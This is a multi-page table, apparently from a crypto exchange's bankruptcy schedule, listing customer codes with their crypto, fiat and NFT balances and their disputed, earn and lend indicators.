| 07303120 | | ETHW[.034965], NFT (305749308215815766/GSW Western Conference Semifinals Commemorative Ticket #948)[1], NFT (32477841298435417/Imola Ticket Stub #819)[1], NFT (430252493764328277/GSW Round 1 Commemorative Ticket #601)[1], NFT (528876296254957544/GSW Championship Commemorative Ring)[1], NFT (541615007319599562/GSW '47 Championship Ticket #20 (Redeemed))[1], NFT (564292761993181452/Entrance Voucher #49)[1], NFT (570549025862590376/GSW Western Conference Finals Commemorative Banner #1464)[1], USD[0.68] | | |
| 07303122 | | ETH[0], NFT (542550817802853631/Cosmic Creations #599)[1], USD[0.00], USDT[0] | | |
| 07303125 | | BTC[.00011269], NFT (425581696627306541/Rox #194)[1] | | |
| 07303128 | | MATIC[.0000005], USD[0.01] | | |
| 07303129 | | USD[0.00], USDT[0] | | |
| 07303138 | | ETH[0.00000328], ETHW[0.41172328], MATIC[447.12454541], SOL[0.00000026], USD[0.01] | | |
| 07303141 | | ETH[.06953618], ETHW[0.06953618] | | |
| 07303145 | | USD[0.00] | | |
| 07303153 | | BTC[0.00000017], USD[2.38], USDT[0.00003011] | | |
| 07303154 | | BTC[0], USD[4.64] | | |
| 07303155 | | SHIB[6293700], TRX[.000142], USD[0.07], USDT[0] | | |
| 07303159 | | ETH[.00000001], ETHW[0] | | |
| 07303164 | | AUD[14.20], BAT[2.13697959], BF_POINT[300], BRZ[1], BTC[0.00541053], CAD[7.00], CUSDT[19], DOGE[27.73375531], ETH[0.01139351], ETHW[0.01125671], EUR[11.19], GBP[33.13], HKD[0.00], LINK[.64488851], MATIC[22.30368218], NFT (308294777233217423/Coachella x FTX Weekend 2 #18660)[1], NFT (335001761218011266/You in, Miami? #2)[1], NFT (339946078770276857/Coachella x FTX Weekend 1 #17258)[1], NFT (387000204698398550/None #2 )[1], NFT (442726332927645071 1/Humpty Dumpty #18)[1], NFT (443861444922006421/Brett's Kitchen Cats #2)[1], SHIB[386558.51312325], SOL[9.32470923], TRX[6], USD[1.36], USDT[4.01157454], YFI[.00027322] | Yes | |
| 07303172 | | NFT (467310281020529343/FTX - Off The Grid Miami #2976)[1] | | |
| 07303180 | | NFT (441632462853429206/FTX - Off The Grid Miami #1019)[1] | | |
| 07303183 | | USD[0.00] | | |
| 07303184 | | BTC[0], USD[0.10] | | |
| 07303185 | | BTC[0.00038508], ETH[.00009634], ETHW[.00009634], SOL[.006762], USD[11877.67], USDT[0] | | |
| 07303188 | | USD[0.01] | | |
| 07303194 | | BTC[0.00019920], USD[0.82] | | |
| 07303195 | | USD[20.00] | | |
| 07303196 | | USD[20.00] | | |
| 07303201 | | USD[20.00] | | |
| 07303202 | | USD[20.00] | | |
| 07303203 | | BTC[0], DOGE[.045565], SOL[0.02354186], USD[0.00] | | |
| 07303204 | | BTC[.00063819], USD[2.23] | Yes | |
| 07303205 | | BTC[.003] | | |
| 07303208 | | NFT (292698387494793989/The Hill by FTX #1043)[1], NFT (437599382782809974/FTX - Off The Grid Miami #234)[1], NFT (447133320618254116/Microphone #344)[1], USD[0.00] | | |
| 07303211 | | USD[20.00] | | |
| 07303215 | | USD[20.00] | | |
| 07303216 | | USD[20.00] | | |
| 07303217 | | USD[20.00] | | |
| 07303226 | | USD[0.01], USDT[2.63243810] | | |
| 07303236 | | USDT[0] | | |
| 07303244 | | BTC[0.00077378], SUSHI[.00000001], USD[0.00] | | |
| 07303247 | | USD[11.31] | | |
| 07303249 | | BTC[0], USD[0.00], USDT[0] | | |
| 07303250 | | BTC[0], USDT[2.437587] | | |
| 07303261 | | BTC[0], DAI[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00002247], WBTC[0], YFI[0] | | |
| 07303269 | | ETH[.04239052], ETHW[.04239052], SOL[0], USD[0.00], USDT[0] | | |
| 07303284 | | USD[20.00] | | |
| 07303285 | | USD[20.00] | | |
| 07303286 | | USD[20.00] | | |
| 07303289 | | USD[20.00] | | |
| 07303290 | | USD[20.00] | | |
| 07303291 | | USDT[988.855043] | | |
| 07303292 | | USD[20.00] | | |
| 07303293 | | USD[20.00] | | |
| 07303295 | | USD[20.00] | | |
| 07303297 | Contingent, Disputed | USD[20.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07303298 | | USD[20.00] | | |
| 07303299 | | USD[20.00] | | |
| 07303300 | | USD[20.00] | | |
| 07303301 | | USD[20.00] | | |
| 07303304 | | USD[20.00] | | |
| 07303305 | | USD[20.00] | | |
| 07303306 | | USD[20.00] | | |
| 07303311 | | USDT[0.00480325] | | |
| 07303318 | Contingent, Disputed | USD[20.00] | | |
| 07303319 | | USD[20.00] | | |
| 07303326 | | DOGE[.6944989], USD[0.00] | | |
| 07303334 | | NFT (5582775790299990195/FTX - Off The Grid Miami #2914)[1], TRX[.028], USD[0.00], USDT[0.00289361] | | |
| 07303336 | | USD[0.00] | | |
| 07303337 | | USD[0.60], USDT[0] | | |
| 07303340 | Contingent, Disputed | AUD[37.77], BAT[0], BRZ[64.00481998], BTC[.08946321], CAD[3.98], CUSDT[3], DOGE[26276.8237101], ETH[.27940513], ETHW[.27940513], EUR[20.18], GRT[1], SOL[1122.69934393], SUSHI[65.965089911], USD[2057.37] | | |
| 07303343 | | AAVE[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], LINK[0], LTC[0], MKR[0.00002138], PAXG[0], SOL[0], TRX[0], WBTC[0], YFI[0] | | |
| 07303348 | | USD[20.00] | | |
| 07303352 | | SOL[.62744588], USD[0.00] | | |
| 07303364 | | MATIC[1] | | |
| 07303367 | | BTC[.00001252], ETHW[1.13525] | | |
| 07303368 | | BTC[0.04808197], ETH[13.88261629], ETHW[13.66353572], SOL[1.32235713], USD[942.40], USDT[0] | | ETH[13.663535] |
| 07303369 | | USD[0.00] | | |
| 07303372 | | BTC[0], SHIB[3231232.73799258], SOL[0], USD[0.00], USDT[0.00000002] | | |
| 07303374 | | USD[1.96] | | |
| 07303375 | | ETH[.89450722], ETHW[30.90150621], MATIC[5720], SOL[599.19142196], USD[40492.44], USDT[0] | | |
| 07303377 | | BF_POINT[700], NFT (2980955971352144486/Entrance Voucher #2666)[1], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07303378 | | USD[500.00] | | |
| 07303381 | | BCH[0.00000257], BTC[0.01714825], ETH[.0005758], ETHW[.0005758], GRT[.7982], KSHIB[9.05675], LINK[165.3645475], MATIC[.65325], MKR[.000891], PAXG[0.00001966], SOL[.00875275], SUSHI[193.7841625], TRX[1093.4564], UNI[.0305575], USD[5701.83], USDT[0] | | |
| 07303383 | | USD[0.00] | | |
| 07303386 | | BTC[0.00005986], ETH[0.03212864], ETHW[0.03212864], SOL[0.00857120], USD[65.29] | | |
| 07303388 | | USD[0.06], USDT[0] | | |
| 07303392 | | USD[0.24] | | |
| 07303393 | | NFT (4395932793136103356/Entrance Voucher #2684)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07303394 | | USDT[0.00000002] | | |
| 07303397 | | USD[20.00] | | |
| 07303398 | | USD[20.00] | | |
| 07303399 | | USD[20.00] | | |
| 07303400 | | USD[20.00] | | |
| 07303401 | | USD[0.89] | | |
| 07303404 | | BTC[0], USDT[0.00000026] | | |
| 07303409 | | ETH[.00100004], USD[5.00] | | |
| 07303410 | | USDT[0.00000023] | | |
| 07303414 | | USD[20.00] | | |
| 07303415 | | USD[20.00] | | |
| 07303420 | | BTC[.00008736], ETH[.0005856], ETHW[.0005856], GRT[.8728], MATIC[8.496], MKR[.000388], NFT (3583665427227749123/CloudNFT Series 1 #13)[1], NFT (408335513539009077/Monochrome Collection #1 #4)[1], NFT (4688400819489506717/Fractal Studio - Island #11)[1], NFT (48300703081410128/Valley #2)[1], SOL[.004638], UNI[.08], USD[0.81] | | |
| 07303430 | | BTC[0], ETH[0.00000001], USD[0.68], USDT[0.00000369] | | |
| 07303439 | | AVAX[0.10860000], BCH[.00099864], SOL[.00916669], USD[0.63] | | |
| 07303448 | Contingent, Disputed | USD[0.00] | | |
| 07303451 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07303452 | | USD[20.00] | | |
| 07303453 | | USD[20.00] | | |
| 07303457 | | USD[20.00] | | |
| 07303460 | | USD[20.00] | | |
| 07303464 | | USD[20.00] | | |
| 07303469 | | USD[20.00] | | |
| 07303474 | | USD[20.00] | | |
| 07303490 | | BTC[0], DAI[.00000001], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07303492 | | BTC[.00001211], SOL[.51], USD[0.66] | | |
| 07303493 | | ETH[.013], USD[92.52], USDT[0] | | |
| 07303495 | | USDT[0] | | |
| 07303497 | | BRZ[1], BTC[.00000001], DOGE[3], GRT[1], SHIB[2], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07303504 | | USDT[0] | | |
| 07303508 | | BTC[0.00000501], ETH[0], MATIC[0], USD[0.00] | | |
| 07303511 | | NFT (318148165602431830/Serum Surfers X Crypto Bahamas #23)[1], NFT (513955225641539803/Resilience #17)[1] | | |
| 07303519 | | USD[20.00] | | |
| 07303521 | | ETH[.00053776], ETHW[0.00053776], USD[0.24] | | |
| 07303526 | | BTC[0], ETH[0], ETHW[0], GRT[0], LTC[0], TRX[0], USD[0.02] | | |
| 07303527 | | USD[0.00] | | |
| 07303534 | | SOL[20.28122711], USD[1.00] | | |
| 07303548 | | BTC[0], ETH[0], LTC[0], SOL[0], SUSHI[0], USDT[0.00000416] | | |
| 07303551 | | USD[0.00] | | |
| 07303554 | | USD[0.26] | | |
| 07303557 | | USD[149.51] | | |
| 07303558 | | BTC[.1286712], DOGE[1053.86660617], ETH[1.74960939], ETHW[258.37327004], SOL[59.48013018], USD[0.00] | | |
| 07303563 | | NFT (556233796217058224/WrekYourRektum)[1], SOL[1.12485679], USD[300.00] | | |
| 07303566 | | USD[20.00] | | |
| 07303568 | | BTC[0], USD[0.00], USDT[0.00000966] | | |
| 07303569 | | ETH[.0444024], ETHW[.0444024], SOL[4.98], USD[1.11] | | |
| 07303574 | | ETH[.014], ETHW[.014], USD[5.00] | | |
| 07303583 | | ETH[0], ETHW[0], NFT (290364631693209046/Beasts #995)[1], NFT (465270706589852143/Golden Hill #218)[1], SOL[.00000001], TRX[.000017], USD[0.00], USDT[0] | | |
| 07303592 | | USD[2.92] | | |
| 07303593 | Contingent, Disputed | BTC[0.00004007], USD[0.00] | | |
| 07303607 | | SOL[0], USD[10.07] | | |
| 07303608 | | USD[0.00], USDT[.001651] | | |
| 07303610 | | BTC[0.01074787], ETH[.06123547], ETHW[.06123547], SOL[31.97716675], USD[791.64], USDT[9.87575494] | | |
| 07303613 | | USD[0.00] | | |
| 07303614 | | USD[20.00] | | |
| 07303615 | | MKR[.000736], USD[0.00] | | |
| 07303616 | | USD[20.00] | | |
| 07303617 | | USD[20.00] | | |
| 07303618 | Contingent, Disputed | BTC[0.03258241], CAD[156.36], ETH[.02202159], ETHW[.02202159], GBP[20.42], LTC[1.47102374], SOL[19.10540179], USD[302.46], USDT[1.17601061], XRP[75.80556042] | | |
| 07303621 | | USD[0.43] | | |
| 07303623 | | BTC[.00047359], USD[0.00], USDT[.00017466] | | |
| 07303624 | | BTC[.0576408], ETH[4.13586], ETHW[4.13586], SOL[23.976], USD[4.43] | | |
| 07303629 | | USDT[.00679492] | | |
| 07303635 | | BTC[0] | | |
| 07303638 | | USD[0.07] | | |
| 07303639 | | ETH[0], LINK[0], SOL[0], USD[0.38], USDT[0.00007936] | | |
| 07303642 | | BTC[0] | | |
| 07303645 | | USDT[0.00005858] | | |
| 07303652 | | NFT (302695311874700323/Degen Trash Panda #10311)[1], NFT (352128689462075972/Miami Grand Prix 2022 - ID: BF05A725)[1], USD[0.00] | | |
| 07303653 | | USD[20.00] | | |
| 07303654 | | USD[20.00] | | |
| 07303655 | | USD[20.00] | | |
| 07303656 | | USD[20.00] | | |
| 07303657 | | USD[20.00] | | |
| 07303658 | | USD[20.00] | | |
| 07303664 | | DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00] | | |
| 07303666 | | USD[0.18], USDT[0] | | |
| 07303675 | | DOGE[153], USD[0.87] | | |
| 07303678 | | USD[20.00] | | |
| 07303679 | | USD[20.00] | | |
| 07303684 | | USD[55.26] | | |
| 07303685 | | USD[20.00] | | |
| 07303686 | | USD[20.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07303689 | | USD[20.00] | | |
| 07303690 | | USD[1.77] | | |
| 07303694 | | USD[20.00] | | |
| 07303697 | | USD[0.04], USDT[0.00030475] | | |
| 07303698 | | USD[20.00] | | |
| 07303700 | | USD[20.00] | | |
| 07303701 | | USD[20.00] | | |
| 07303702 | | USD[20.00] | | |
| 07303703 | | USD[20.00] | | |
| 07303704 | | USD[20.00] | | |
| 07303705 | | USD[20.00] | | |
| 07303706 | | USD[20.00] | | |
| 07303707 | | USD[20.00] | | |
| 07303708 | | USD[20.00] | | |
| 07303709 | | USD[20.00] | | |
| 07303710 | | USD[20.00] | | |
| 07303711 | | USD[20.00] | | |
| 07303712 | | USD[20.00] | | |
| 07303713 | | USD[20.00] | | |
| 07303714 | | USD[20.00] | | |
| 07303715 | | USD[20.00] | | |
| 07303716 | | USD[20.00] | | |
| 07303717 | | USD[20.00] | | |
| 07303718 | | USD[20.00] | | |
| 07303719 | | USD[20.00] | | |
| 07303720 | | USD[10.00] | | |
| 07303721 | | USD[10.00] | | |
| 07303722 | | USD[10.00] | | |
| 07303724 | | USD[10.00] | | |
| 07303725 | | USD[10.00] | | |
| 07303726 | | USD[10.00] | | |
| 07303727 | | USD[10.00] | | |
| 07303728 | | USD[10.00] | | |
| 07303729 | | USD[10.00] | | |
| 07303730 | | USD[10.00] | | |
| 07303731 | | BTC[0.00012004], ETH[.0010732], ETHW[.0010732], USD[10.50] | | |
| 07303732 | | USD[10.00] | | |
| 07303733 | | SOL[0], USDT[0] | | |
| 07303735 | | USD[4942.19] | | |
| 07303746 | | CUSDT[46.791], USD[15.28], USDT[20.01454] | | |
| 07303747 | | NFT (445386799606090452/You in, Miami? #8)[1], USD[10.00] | | |
| 07303753 | | BTC[0], ETH[0], SUSHI[.00000001], USD[1.79] | | |
| 07303766 | | BTC[0], USD[24.58] | | |
| 07303768 | | BTC[.002] | | |
| 07303773 | | TRX[.868] | | |
| 07303779 | | USD[10.00] | | |
| 07303782 | | BCH[0.00059800], BTC[0], ETH[0], ETHW[0.00058014], SOL[0.00527529], USD[0.01], USDT[0.00132841] | | |
| 07303783 | | BTC[.00371211] | | |
| 07303789 | | AAVE[0], BTC[0], ETH[0.00000001], SOL[0], SUSHI[0] | | |
| 07303791 | | USD[500.00] | | |
| 07303792 | | ETH[0], USD[2.00] | | |
| 07303803 | | ETH[.01079706], ETHW[.01079706], SOL[74.715], USD[30.97] | | |
| 07303806 | | BTC[.00035989], SOL[31.872] | | |
| 07303819 | | BTC[0], USD[11.82] | | |
| 07303829 | | AUD[40.35], AVAX[0.01001168], BAT[.867], BCH[0], BTC[0.00068221], CAD[415.93], DOGE[0], ETH[0.01161883], ETHW[15.76478136], GBP[285.70], LTC[0.01000050], MATIC[0.00008327], NEAR[170.347392], PAXG[0.14558688], SOL[0], TRX[0.03091044], USD[15534.12], USDT[0.01086241] | | AUD[40.00], CAD[400.00], GBP[280.00], PAXG[.1455], USD[162.00] |
| 07303830 | | USD[0.00] | | |
| 07303832 | | SOL[3.5964], USD[3.00] | | |
| 07303836 | | BTC[0], ETH[0.64866404], ETHW[0.64866404], SOL[4.68891410], SUSHI[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07303837 | | ETH[0.00000001], ETHW[0] | | |
| 07303839 | | USD[10.00] | | |
| 07303840 | | USD[10.00] | | |
| 07303842 | | USD[10.00] | | |
| 07303861 | | BTC[0], USD[2.61] | | |
| 07303862 | | USD[10.00] | | |
| 07303863 | | USD[10.00] | | |
| 07303864 | | USD[10.00] | | |
| 07303865 | | USD[10.00] | | |
| 07303866 | | USD[10.00] | | |
| 07303867 | | USD[10.00] | | |
| 07303868 | | USD[10.00] | | |
| 07303869 | | USD[10.00] | | |
| 07303870 | | USD[10.00] | | |
| 07303871 | | USD[10.00] | | |
| 07303872 | | USD[10.00] | | |
| 07303877 | | USD[0.01], USDT[0] | | |
| 07303883 | | BTC[0] | | |
| 07303896 | | BTC[0], DOGE[1], ETH[.00000001], ETHW[2.00500000], SOL[0], USD[-0.16] | | |
| 07303897 | | USD[10.00] | | |
| 07303898 | | USD[10.00] | | |
| 07303899 | | USD[10.00] | | |
| 07303904 | Contingent, Disputed | USD[0.00] | | |
| 07303907 | | NFT (331340941631381319/Romeo #877)[1], NFT (563964339670461104/Juliet #584)[1], USDT[.863259] | | |
| 07303913 | | NFT (371595926625529633/Miami Grand Prix 2022 - ID: 34DCEF41)[1], NFT (407247034171236150/FTX - Off The Grid Miami #5796)[1] | | |
| 07303917 | | USDT[15.6] | | |
| 07303921 | | SOL[0.00000959], USD[0.00] | | |
| 07303923 | | USD[10.00] | | |
| 07303929 | | USD[0.06] | | |
| 07303930 | | USD[10.00] | | |
| 07303931 | | BTC[.000491] | | |
| 07303932 | | USD[10.00] | | |
| 07303934 | | USD[10.00] | | |
| 07303935 | | USD[0.00] | | |
| 07303951 | | LTC[0], TRX[0] | | |
| 07303958 | | USD[0.00] | | |
| 07303966 | | USD[0.00] | | |
| 07303979 | | USD[500.00] | | |
| 07303980 | | BTC[.00001459], ETHW[2.637492], USD[0.10] | | |
| 07303981 | | USD[0.01] | | |
| 07303989 | | BAT[1], SOL[0], TRX[1], USD[0.00], USDT[0.00000005] | | |
| 07303991 | | BTC[0], USD[0.00] | | |
| 07303992 | | BCH[.00644], BTC[0], USD[0.00], USDT[13.69557314] | | |
| 07303993 | | BCHA[.000696], USD[0.18] | | |
| 07303999 | | USD[10.00] | | |
| 07304000 | | USD[0.03] | | |
| 07304005 | | BTC[.00295221] | | |
| 07304006 | | ETHW[6.21627535], FTX_EQUITY[0], USD[0.00], USDT[0] | | |
| 07304007 | | USD[0.00] | | |
| 07304021 | | SOL[0] | | |
| 07304024 | | USD[0.01] | | USD[0.01] |
| 07304028 | | USDT[0] | | |
| 07304035 | | USD[4980.02], USDT[20.00997] | | |
| 07304050 | | SOL[.00885], USD[1.24], USDT[.54661005] | | |
| 07304052 | | BTC[0], ETH[0], ETHW[0] | | |
| 07304055 | | NFT (296889668313107989/SMB #1042)[1], NFT (328097281734211847/MagicEden Vaults)[1], NFT (347563217842166204/MagicEden Vaults)[1], NFT (360562494234039498/MagicEden Vaults)[1], NFT (381871007409825816/MagicEden Vaults)[1], NFT (393000947508983605/Miniverse Hero #00948)[1], NFT (456184223517222537/MagicEden Vaults)[1], NFT (481083326952380899/Miniverse Weapon #182553)[1], SOL[.17330753], USD[99.50], WEST_REALM_EQUITY[0] | | |
| 07304056 | | BTC[0], USD[0.00], USDT[0.00002965] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07304063 | | BTC[0], LTC[.07614596], UNI[.00000001], USD[5.12], USDT[.94033116] | | |
| 07304066 | | BTC[0], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07304067 | | BTC[0], SOL[.00000001] | | |
| 07304074 | | BTC[.0002988], SOL[1.60] | | |
| 07304077 | | USD[10.00] | | |
| 07304080 | | BCH[.00009499], BCHA[.00049899], BTC[.00001516], LTC[.00702915], USD[0.04] | | |
| 07304081 | | ETH[.444], ETHW[.444] | | |
| 07304092 | | NFT (313009882645281616/FTX - Off The Grid Miami #4222)[1], NFT (34304267861741589/Bahrain Ticket Stub #1659)[1], USD[76.21] | | |
| 07304093 | | USD[0.42] | | |
| 07304095 | | SOL[.768] | | |
| 07304097 | | BTC[0], ETH[0], GRT[397.60325611], MATIC[.00000001], NFT (317590567415694779/Prototype)[1], NFT (338626679355264693/Prototype #2)[1], NFT (346764899635730226/Jungle Bubble #4)[1], NFT (420386515944982130/Prototype #4)[1], NFT (443879292134113465/Fishbowl Starting a Fire)[1], NFT (508675795449097677/Jungle Bubble #6)[1], NFT (519972886273437130/Jungle Bubble #3)[1], NFT (533435526520083333/Prototype #3)[1], NFT (547944504491816117/Jungle Bubble #5)[1], NFT (548513320580979216/Jungle Bubble)[1], NFT (567327383051668070/Jungle Bubble #2)[1], SOL[.94372028], USD[10.70], USDT[0] | | |
| 07304109 | | BTC[0.00015371] | | |
| 07304114 | | ETH[.11105144], ETHW[.10807244], PAXG[.04686538], SOL[.004], UNI[3.8961], USDT[222.97791528] | | |
| 07304118 | | USD[0.00] | | |
| 07304125 | | BCH[.016075], BF_POINT[200], BTC[0], MKR[.000948], NFT (319632486671008260/FTX - Off The Grid Miami #2229)[1], NFT (331939264207050405/Miami Ticket Stub #429)[1], USD[0.00], USDT[501.04915506] | | |
| 07304130 | | BTC[0], LINK[0], USD[3.57], USDT[0] | | |
| 07304132 | | BTC[0], SOL[0.97202469] | | |
| 07304135 | | USD[0.00], USDT[0] | | |
| 07304137 | | USD[0.00] | | |
| 07304140 | | ETH[0], NEAR[0.09452474], SOL[0], USD[0.00], USDT[0] | | |
| 07304145 | | ETH[.00416231], ETHW[.00416231] | | |
| 07304153 | | USD[1.25], USDT[.00045] | | |
| 07304157 | | USD[300.00] | | |
| 07304162 | Contingent, Disputed | USD[0.00] | | |
| 07304172 | | BTC[0.00005735], USD[10.45] | | |
| 07304174 | | USD[10.00] | | |
| 07304175 | | USD[10.00] | | |
| 07304177 | | BTC[0], USDT[0] | | |
| 07304178 | | NFT (530424373939403660/Entrance Voucher #9987)[1] | | |
| 07304179 | | USD[100.00] | | |
| 07304196 | | BF_POINT[200], NFT (319730702529775499/Entrance Voucher #29354)[1], NFT (525739046172498299/Humpty Dumpty #558)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07304207 | | ETH[.3], ETHW[.3] | | |
| 07304213 | Contingent, Disputed | TRX[.000035], USD[0.00], USDT[0] | | |
| 07304214 | | USD[500.00] | | |
| 07304219 | | USD[10.00] | | |
| 07304224 | | USD[100.00] | | |
| 07304228 | | USD[0.46] | | |
| 07304258 | | BTC[0], USDT[0.00003133] | | |
| 07304260 | | AVAX[0], MATIC[0], USD[200.00], USDT[0] | | |
| 07304270 | | MATIC[50], SHIB[199800], SOL[24.5], USD[9738.10] | | |
| 07304274 | | BTC[0], ETH[.00080001], ETHW[0.00080000], SOL[.00602], USD[0.98], USDT[0.51714100] | | |
| 07304277 | | AVAX[0], BTC[0], ETH[0], PAXG[0], SOL[0.00130456], USD[21.77], USDT[0] | | |
| 07304278 | | SOL[.681], USDT[1.308968] | | |
| 07304289 | | USD[0.06] | | |
| 07304295 | | USD[0.92] | | |
| 07304296 | | BTC[0] | | |
| 07304298 | | BTC[0.00008760], USD[0.01] | | |
| 07304311 | | USD[10.00] | | |
| 07304315 | Contingent, Disputed | USD[1.27] | | |
| 07304317 | | USD[10.00] | | |
| 07304318 | | LTC[.000823], USD[1.47] | | |
| 07304319 | | SOL[0], USD[0.01] | | |
| 07304320 | | SOL[.0295208], USD[1.46], USDT[.008177] | | |
| 07304322 | | USD[10.00] | | |
| 07304329 | | USD[75.00] | | |
| 07304330 | | USDT[0.00001635] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07304335 | | USD[10.00] | | |
| 07304338 | | USD[10.00] | | |
| 07304339 | | BTC[0.00002347], SOL[60], USD[0.00] | | |
| 07304340 | | COMP[1.01380708] | | |
| 07304346 | | ETH[.000297], ETHW[.000297] | | |
| 07304355 | | AAVE[.003], BCH[.000693], BTC[0.00007023], DOGE[1.051], ETH[.000911], ETHW[.294989], GRT[0], LINK[.2233], MATIC[128.28], NFT (432220596477426060/mindin Art Originals #1)[1], NFT (532599146655346370/CP Punks - Original Batch #1)[1], NFT (573098944552353789/mindin Art Originals #2)[1], SOL[.00869], SUSHI[.495], USD[85.89], USDT[1.78373602] | | |
| 07304359 | | DOGE[1], USD[0.00] | | |
| 07304367 | | ETHW[.123893], PAXG[.0000834], SOL[0.00500000], TRX[.000114], USD[0.00], USDT[0.00850000] | | |
| 07304368 | | USD[24.79] | | |
| 07304369 | | USD[0.01], USDT[.24884] | | |
| 07304376 | | ETHW[84.851], USD[0.00] | | |
| 07304381 | | BTC[0], DOGE[.38], LTC[2.01798], TRX[4036.07], USD[203.26] | | |
| 07304390 | | BTC[.0000712], USD[0.00] | | |
| 07304395 | | NFT (291718439229971421/Australia Ticket Stub #2335)[1], NFT (488281109764812170/FTX - Off The Grid Miami #6856)[1], NFT (512461278467271270/Punk Mfers #2550)[1], SOL[0], USD[11.40], USDT[.0055034] | | |
| 07304403 | | USD[8.43] | | |
| 07304408 | | BTC[0] | | |
| 07304409 | | BTC[0], PAXG[.00000001], USD[0.00] | | |
| 07304417 | | USD[0.37] | | |
| 07304423 | | USD[0.51] | | |
| 07304424 | | USD[1260.38] | | |
| 07304436 | | ETH[.00072971], ETHW[0.00072970], USD[195.09], USDT[.015729] | | |
| 07304438 | | TRX[11.68159895], USD[0.45], USDT[0] | | |
| 07304453 | | PAXG[.25688361] | | |
| 07304465 | | BTC[.00000685], USD[0.43], USDT[0] | | |
| 07304481 | | BTC[0.00001800], ETH[0], USD[0.05], USDT[0] | | |
| 07304488 | | USD[11.80] | | |
| 07304490 | | USD[0.00] | | |
| 07304499 | | USD[10.00] | | |
| 07304515 | | SOL[.09], USD[1.96] | | |
| 07304519 | | NFT (418966012378105956/Entrance Voucher #8597)[1] | | |
| 07304535 | | NFT (290940673680123052/Reflections)[1], SHIB[148540.85729788], USD[0.00] | | |
| 07304539 | | BTC[0], ETH[0], ETHW[0.00094900], LINK[0], SOL[0.06774437], SUSHI[0], USD[0.00] | | |
| 07304541 | | BTC[0.00000301], DOGE[399.396], LTC[.0498], TRX[0], USD[0.00], USDT[0.02333042] | | |
| 07304552 | | LINK[.0999], USD[0.01] | | |
| 07304559 | | ALGO[82.844646], ETH[0], USDT[0] | | |
| 07304560 | | BCH[.01303186], ETHW[.05086708], SHIB[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07304564 | | ETHW[9.99], USD[33.45], USDT[0.00331234] | | |
| 07304565 | | USD[0.00], USDT[0] | | |
| 07304584 | | USD[0.00] | | |
| 07304593 | | NFT (533703547631618297/FTX - Off The Grid Miami #1885)[1], USD[0.45], USDT[0] | | |
| 07304596 | | BTC[0] | | |
| 07304600 | | USD[1.85] | | |
| 07304631 | | BTC[0] | | |
| 07304633 | | BTC[.00000537], SOL[.519] | | |
| 07304634 | | BTC[0], DAI[.00000001], SUSHI[.00000001], USD[0.02], USDT[0] | | |
| 07304637 | | NFT (457717390526133613/Bahrain Ticket Stub #2141)[1] | | |
| 07304639 | | USD[0.00], USDT[0] | | |
| 07304650 | | BTC[.00006], NFT (453895020943195386/Romeo #1147)[1], NFT (558881932363723450/Humpty Dumpty #1549)[1], USD[0.15], USDT[.04243302] | | |
| 07304701 | | NFT (325040348066682426/FTX - Off The Grid Miami #2843)[1], USD[63.13] | | |
| 07304709 | | USD[10.00] | | |
| 07304726 | | USDT[0.00011943] | | |
| 07304741 | | NFT (456925771247064330/Solninjas #129)[1] | | |
| 07304743 | | USD[10.00] | | |
| 07304752 | | USD[10.00] | | |
| 07304761 | | BTC[.0000746] | | |
| 07304781 | | BTC[.00002781], USD[0.00] | | |
| 07304787 | | USD[0.00], USDT[0] | | |
| 07304797 | | BTC[0.00000007], ETH[0], LTC[.00751942], SOL[0], USD[0.50], USDT[0.19393400] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07304804 | | SOL[47.52972012], USD[0.00], USDT[0.00000026] | | |
| 07304809 | | DOGE[290.19282511] | | |
| 07304824 | | DAI[.03163942], ETH[.001], USD[0.76] | | |
| 07304888 | | BAT[6.972], BTC[.0008991], DOGE[230.592], GRT[.976], USD[8.86], USDT[.00177] | | |
| 07304900 | | BTC[0.00001203] | | |
| 07304905 | | USD[0.79] | | |
| 07304910 | | BTC[0], ETH[0], PAXG[0], USD[0.00], USDT[0] | | |
| 07304919 | | NFT (396633314520509471/FTX - Off The Grid Miami #3136)[1] | | |
| 07304921 | | BTC[.003482], SHIB[1], USD[0.00] | | |
| 07304945 | | NFT (573500876555224629/Humpty Dumpty #642)[1] | | |
| 07304946 | | BTC[0.00060251], USD[14.86] | | |
| 07304951 | | USD[0.00] | | |
| 07304952 | | BTC[0], NFT (312721778428110136/Rainbow #120)[1], SOL[0], SUSHI[.00000001] | | |
| 07304954 | | AAVE[.00638], SOL[.00758], USD[0.00] | | |
| 07304964 | | BTC[.00002593], USD[0.01] | Yes | |
| 07304969 | | DOGE[1], SHIB[1], USD[3.01] | | |
| 07304970 | | USD[10.00] | | |
| 07304972 | Contingent, Disputed | USD[10.00] | | |
| 07304977 | | USD[0.00] | | |
